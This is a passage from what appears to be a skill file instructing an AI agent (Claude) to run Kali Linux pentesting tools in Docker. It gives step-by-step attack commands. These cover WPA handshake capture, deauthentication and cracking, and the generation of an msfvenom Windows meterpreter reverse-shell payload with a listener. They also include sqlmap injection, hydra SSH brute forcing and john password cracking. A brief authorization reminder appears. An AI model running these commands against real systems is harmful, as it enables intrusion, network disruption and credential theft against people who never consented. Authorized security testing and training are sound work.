# --network host and --cap-add=NET_ADMIN (see Troubleshooting), or --privileged.

# Step 1: Enable monitor mode
docker exec kali airmon-ng start wlan0

# Step 2: Scan networks
docker exec kali airodump-ng wlan0mon

# Step 3: Capture handshake
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /home/kaliuser/shared/capture wlan0mon

# Step 4: Deauth clients
docker exec kali aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon

# Step 5: Crack WPA
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/kaliuser/shared/capture-01.cap
```
### 5. Exploitation Workflow

```bash
# Step 1: Search for exploit
docker exec kali searchsploit apache 2.4.49

# Step 2: Generate payload
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /home/kaliuser/shared/payload.exe

# Step 3: Setup listener in Metasploit
docker exec -it kali msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; exploit"
```
---

## File Management

### Copying Files Between Host and Container

**Note:** Files in mounted volumes are automatically synced - there is no need to use `docker cp` for them.

```bash
# Files are automatically available on both sides:

# Save in container → appears in ./shared/ on host immediately
docker exec kali nmap -sV target -oA /home/kaliuser/shared/scan

# Access on host
cat ./shared/scan.nmap

# Add files from host → available in container immediately
echo "target1.com" > ./shared/targets.txt
docker exec kali cat /home/kaliuser/shared/targets.txt

# Only use docker cp for non-mounted paths
docker cp kali:/tmp/some-file.txt ./
docker cp ./local-file.txt kali:/tmp/
```
### Working with Wordlists

**Common Wordlist Locations:**
- `/usr/share/wordlists/rockyou.txt` - Most popular password list
- `/usr/share/wordlists/dirb/common.txt` - Common directories
- `/usr/share/seclists/` - SecLists collection
- `/usr/share/wordlists/metasploit/` - Metasploit wordlists

```bash
# List available wordlists
docker exec kali find /usr/share/wordlists -type f

# Extract rockyou (if gzipped; a fresh Kali image ships rockyou.txt.gz)
docker exec kali gunzip /usr/share/wordlists/rockyou.txt.gz
```
---

## Troubleshooting

### Container Won't Start

```bash
# Check logs
docker logs kali

# Remove and recreate (keep the volume mounts, otherwise results stop persisting)
docker rm -f kali
docker run -d --name kali \
  -v "$(pwd)/shared:/home/kaliuser/shared" \
  -v "$(pwd)/wordlists:/home/kaliuser/wordlists" \
  kali-comprehensive
```
### Network Issues

```bash
# (add the same -v mounts for ./shared and ./wordlists to either command)

# Use host network (needed to see LAN traffic, ARP spoof, or use a wireless adapter)
docker run -d --name kali --network host kali-comprehensive

# Add network capabilities (raw sockets for nmap SYN scans, tcpdump, ettercap, etc.)
docker run -d --name kali --cap-add=NET_RAW --cap-add=NET_ADMIN kali-comprehensive
```
### Permission Issues

```bash
# Run as root (already default)
docker exec -u root kali [command]

# Fix workspace permissions
docker exec kali chmod -R 777 /workspace /results

# Bind-mounted volumes keep the host's ownership; if kaliuser cannot write to
# the shared volume, chown it rather than opening it to everyone
docker exec -u root kali chown -R kaliuser:kaliuser /home/kaliuser/shared
```
### Metasploit Database Issues

```bash
# Initialize database
docker exec kali service postgresql start
docker exec kali msfdb init

# Check status
docker exec kali msfdb status
```
---

## Best Practices

### 1. ALWAYS Save Results to /home/kaliuser/shared/

**MANDATORY:** Every command MUST save output to the shared volume with timestamps:

```bash
# ✅ CORRECT - Output saved to shared volume with timestamp
docker exec kali bash -c 'nmap -sV target -oA /home/kaliuser/shared/scan_$(date +%Y%m%d_%H%M%S)'

# ❌ WRONG - Output not saved (lost on container restart)
docker exec kali nmap -sV target

# ✅ CORRECT - Redirect to shared volume. The pipe runs inside the container
# (bash -c), so tee writes to the container path; a pipe placed after the
# docker exec line would run tee on the host, where /home/kaliuser/shared/
# normally does not exist.
docker exec kali bash -c 'whatweb target.com | tee /home/kaliuser/shared/whatweb_$(date +%Y%m%d_%H%M%S).txt'

# Standard output flags (always use /home/kaliuser/shared/)
-o /home/kaliuser/shared/file_$(date +%Y%m%d_%H%M%S).txt     # Generic output
-oA /home/kaliuser/shared/scan_$(date +%Y%m%d_%H%M%S)        # Nmap: all formats
-w /home/kaliuser/shared/capture_$(date +%Y%m%d_%H%M%S).pcap # Capture files
```
### 2. Organize by Tool and Date

Create organized directories for better result management:

```bash
# Create directory structure (wrapped in bash -c so the brace expansion and
# $(date) are evaluated by the container's bash regardless of the host shell)
docker exec kali bash -c 'mkdir -p /home/kaliuser/shared/{nmap,web,passwords,wireless,exploitation}/$(date +%Y%m%d)'

# Save to organized locations
docker exec kali bash -c 'nmap -sV target -oA /home/kaliuser/shared/nmap/$(date +%Y%m%d)/scan_$(date +%H%M%S)'
```

**Mounted volumes:**
- `./shared/` ↔ `/home/kaliuser/shared/` - ALL scan results and outputs (MANDATORY)
- `./wordlists/` ↔ `/home/kaliuser/wordlists/` - Custom wordlists only
- Built-in wordlists: `/usr/share/wordlists/` (rockyou, seclists, dirb, etc.)

### 3. Scope Your Testing
Always:
- Get written authorization
- Define scope boundaries
- Document everything
- Report findings responsibly
### 4. Clean Up After Testing

```bash
# Stop monitor mode
docker exec kali airmon-ng stop wlan0mon

# Clear temporary files. The glob must expand inside the container: an unquoted
# /tmp/* on the docker exec line is expanded by the host shell against the HOST's /tmp.
docker exec kali bash -c 'rm -rf /tmp/*'

# Archive results (same reason: the *.txt glob belongs to the container shell)
docker exec kali bash -c 'tar -czf /home/kaliuser/shared/assessment-$(date +%Y%m%d).tar.gz /home/kaliuser/shared/*.txt'
```
---

## Quick Reference

### Port Scanning
```bash
docker exec kali nmap -sV -p- target
```

### Directory Enumeration
```bash
docker exec kali gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt
```

### SQL Injection
```bash
docker exec kali sqlmap -u "http://target/page?id=1" --batch
```

### Password Cracking
```bash
docker exec kali john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
```

### Network Brute Force
```bash
docker exec kali hydra -l admin -P passwords.txt ssh://target
```

### WiFi Cracking
```bash
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.cap
```

## When to Use This Skill
Use this skill when:
- Conducting authorized penetration testing
- Performing security assessments
- Testing network security
- Analyzing web applications
- Cracking passwords (authorized)
- Wireless security auditing
- Forensics analysis
- Reverse engineering
- Learning security techniques

Claude will read this skill and execute commands via bash_tool, providing efficient, direct access to all pentesting tools without MCP protocol overhead.